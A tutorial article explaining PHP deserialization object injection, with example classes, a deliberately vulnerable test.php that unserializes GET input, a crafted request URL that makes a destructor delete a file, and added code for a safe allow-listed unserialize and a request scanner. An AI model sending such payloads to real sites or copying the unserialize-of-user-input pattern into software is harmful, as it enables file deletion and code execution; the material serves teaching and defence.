
PHP deserialization object injection vulnerability

Mar 10, 2018, 01:16 PM


PHP object injection is a very common vulnerability. Although this type of vulnerability is somewhat difficult to exploit, it is still very dangerous. This article explains PHP's deserialization object injection vulnerability in detail. I hope it helps.

Analysis

PHP basics

serialize converts an object into a string, which can then be stored.
unserialize turns the serialized string back into an object.

A PHP class may contain special functions called magic functions. Magic function names start with the symbol __,
such as __construct, __destruct, __toString, __sleep, __wakeup, etc.

These functions are called automatically under certain circumstances:
__construct is called when an object is created,
__destruct is called when an object is destroyed,
__toString is called when an object is used as a string.

Example

For example:

    <?php

    class TestClass
    {
        public $variable = 'This is a string';

        public function PrintVariable()
        {
            echo $this->variable . '<br />';
        }

        public function __construct()
        {
            echo '__construct <br />';
        }

        public function __destruct()
        {
            echo '__destruct <br />';
        }

        public function __toString()
        {
            return '__toString<br />';
        }
    }

    $object = new TestClass();
    $object->PrintVariable();
    echo $object;

    ?>


PHP allows you to save an object for later reuse. This process is called serialization.

Why is there a serialization mechanism?
Variable values sometimes have to be passed across script files. Suppose one script needs the variables of a previous script, but the previous script has already finished and all of its variables and contents have been released. What do we do? Should the previous script loop continuously, waiting for the next script to call it? That is clearly unrealistic.

serialize and unserialize are used to solve this problem. Serialize can convert a variable into a string and save the value of the current variable during the conversion; unserialize can convert the string generated by serialize back into a variable. This perfectly solves cross-script transmission and execution.

The magic functions __construct and __destruct are called automatically when an object is created or destroyed;
the __sleep magic method is called when an object is serialized;
the __wakeup magic method is called when an object is deserialized.

    <?php
    class User
    {
        public $age = 0;
        public $name = '';

        public function Printx()
        {
            echo $this->name . ' is ' . $this->age . ' years old.<br/>';
        }

        public function __construct()
        {
            echo '__construct<br />';
        }

        public function __destruct()
        {
            echo '__destruct<br />';
        }

        // Called by unserialize() after the properties are restored
        public function __wakeup()
        {
            echo '__wakeup<br />';
        }

        // Called by serialize(); returns the property names to serialize
        public function __sleep()
        {
            echo '__sleep<br />';

            return array('name', 'age');
        }
    }

    $usr = new User();
    $usr->age = 20;
    $usr->name = 'John';
    $usr->Printx();
    echo serialize($usr);
    echo '<br/>';

    $str = 'O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}';
    $user2 = unserialize($str);
    $user2->Printx();
    ?>


Now we understand how serialization works, but how do we take advantage of it?
There are multiple possible methods, depending on the application, available classes and magic functions.

Remember that serialized objects contain attacker-controlled object values.
You may find a class that defines __wakeup or __destruct in the web application source code. These functions will affect the web application.

For example, we might find a class that temporarily stores logs in a file. When the object is destroyed, it may no longer need the log file and delete it. Save the following code as log.php.

    <?php
    //log.php
    class LogFile
    {
        // Log file name

        public $filename = 'error.log';

        // Store data in the log file

        public function LogData($text)
        {
            echo 'Log some data: ' . $text . '<br />';
            file_put_contents($this->filename, $text, FILE_APPEND);
        }

        // Delete the log file

        public function __destruct()
        {
            echo '__destruct deletes "' . $this->filename . '" file. <br />';
            unlink(dirname(__FILE__) . '/' . $this->filename);
        }
    }

    ?>

test.php: assume this is the user-facing PHP script.

    <?php
    //test.php
    include 'log.php';

    // ... some code that uses the LogFile class ...

    // Simple class definition

    class User
    {
        // Class data

        public $age = 0;
        public $name = '';

        // Output the data

        public function PrintData()
        {
            echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
        }
    }

    // Rebuild the object from user-supplied data

    $usr = unserialize($_GET['usr_serialized']);

    ?>

123.php

    <?php
    //123.php
    include 'log.php';

    $obj = new LogFile();
    $obj->filename = '1.php';

    echo serialize($obj) . '<br />';

    ?>

At the start, a file named 1.php exists in the directory.

Now the user passes in a serialized string, and test.php deserializes it:

    http://127.0.0.1/test.php?usr_serialized=O:7:%22LogFile%22:1:{s:8:%22filename%22;s:5:%221.php%22;}

As a result, when the deserialized object is released, the __destruct function (from log.php) is called and deletes the file 1.php.
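The corrected form of the unserialize call in test.php, as an added example that is not part of the original article. `load_user` is a hypothetical helper, the LogFile stand-in records its __destruct calls instead of deleting a file, and the code assumes PHP 7.1 or later (the `allowed_classes` option of unserialize exists since PHP 7.0).

```php
<?php
// Added example: constructed stand-ins for the article's classes.
class LogFile
{
    public $filename = 'error.log';
    public static $destructed = [];

    public function __destruct()
    {
        // Records the call instead of unlink() so the demo deletes nothing.
        self::$destructed[] = $this->filename;
    }
}

class User
{
    public $age = 0;
    public $name = '';
}

// Hypothetical helper: returns a User, or null when the input is anything else.
function load_user(string $raw): ?User
{
    // Only User may be instantiated; any other class name in the input
    // becomes an inert __PHP_Incomplete_Class that has no magic methods.
    $value = @unserialize($raw, ['allowed_classes' => [User::class]]);

    if (!($value instanceof User)) {
        return null;
    }
    // Property values are attacker-controlled too, so check their types.
    if (!is_int($value->age) || !is_string($value->name)) {
        return null;
    }
    return $value;
}

// Constructed inputs; the second is the payload from the article's request.
$inputs = [
    'valid user'      => 'O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}',
    'article payload' => 'O:7:"LogFile":1:{s:8:"filename";s:5:"1.php";}',
    'nested LogFile'  => 'O:4:"User":2:{s:3:"age";i:20;s:4:"name";O:7:"LogFile":1:{s:8:"filename";s:5:"1.php";}}',
    'not serialized'  => 'hello',
];

foreach ($inputs as $label => $raw) {
    $user = load_user($raw);
    printf("%-16s => %s\n", $label, $user ? "User({$user->name}, {$user->age})" : 'rejected');
}
printf("LogFile::__destruct calls: %d\n", count(LogFile::$destructed));
```

Only the first input is accepted, and the destructor counter stays at zero because no LogFile object is ever created. Data that never needs to be an object is better exchanged as JSON (json_encode / json_decode), which cannot instantiate classes at all.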


Exploitation summary

Wherever an attacker-controllable variable reaches an unserialize call, a serialized object can be injected to achieve code execution or other deceptive behavior.

Leaving aside __wakeup and __destruct, there are some very common injection points that allow this type of vulnerability to be exploited. Everything depends on the program logic.
For example, a User class may define __toString so that the application can output the object as a string (echo $obj), while another class may define a __toString that reads a file.


Other magic functions can also be used:
If the object calls a non-existent function, __call is called;
If the object attempts to access non-existent class variables, __get and __set are called.

But exploitation of this vulnerability is not limited to magic functions; the same idea also applies to ordinary functions.

For example, the User class may define a get method to find and print some user data, but other classes may define a get method that obtains data from the database, which may lead to SQL injection vulnerabilities.

A set or write method that writes data to an arbitrary file can be used to obtain remote code execution.

The only technical constraint is which classes are available at the injection point, although some frameworks or scripts have autoloading capabilities. The biggest obstacle is human: exploiting this type of vulnerability requires understanding the application, and reading and understanding the code can take a lot of time.
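On the detection side, requests that carry serialized objects can be flagged by the class names they announce. The following is an added example, not code from the original article: `serialized_classes` and `scan_request` are hypothetical helpers, the per-endpoint allow-list is an assumption, and the request lines are constructed (the second is the request shown above).

```php
<?php
// Added example: flag request parameters that carry PHP serialized objects.

// Class names announced by O:<len>:"<name>":<count>:{ tokens (C: is the
// Serializable variant), at the start of the value or nested after a ';'.
function serialized_classes(string $value): array
{
    preg_match_all('/(?:^|;)[OC]:(\d+):"([^"]*)":\d+:\{/', $value, $hits, PREG_SET_ORDER);
    $classes = [];
    foreach ($hits as [, $len, $name]) {
        // Requiring the declared length to match the name cuts false positives.
        if ((int) $len === strlen($name)) {
            $classes[] = $name;
        }
    }
    return $classes;
}

// Returns [parameter => [class, ...]] for every query parameter of $url that
// names a class outside $expected (hypothetical per-endpoint allow-list).
function scan_request(string $url, array $expected = []): array
{
    parse_str(explode('?', $url, 2)[1] ?? '', $params); // URL-decodes the values
    $findings = [];
    foreach ($params as $key => $value) {
        if (!is_string($value)) {
            continue; // array-style parameters are skipped in this sketch
        }
        $unexpected = array_values(array_diff(serialized_classes($value), $expected));
        if ($unexpected) {
            $findings[$key] = $unexpected;
        }
    }
    return $findings;
}

// Constructed request lines for the demonstration.
$requests = [
    '/test.php?usr_serialized=O:4:%22User%22:2:{s:3:%22age%22;i:20;s:4:%22name%22;s:4:%22John%22;}',
    '/test.php?usr_serialized=O:7:%22LogFile%22:1:{s:8:%22filename%22;s:5:%221.php%22;}',
    '/test.php?usr_serialized=a:1:{i:0;O:7:%22LogFile%22:0:{}}',
    '/index.php?q=serialize',
];
foreach ($requests as $url) {
    $found = scan_request($url, ['User']);
    echo ($found ? 'ALERT ' . json_encode($found) : 'ok'), "  $url\n";
}
```

The second and third requests raise an alert for LogFile; the User object and the plain search query pass. A string value that happens to contain an object token would also match, so hits are candidates for review rather than proof of an attack.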
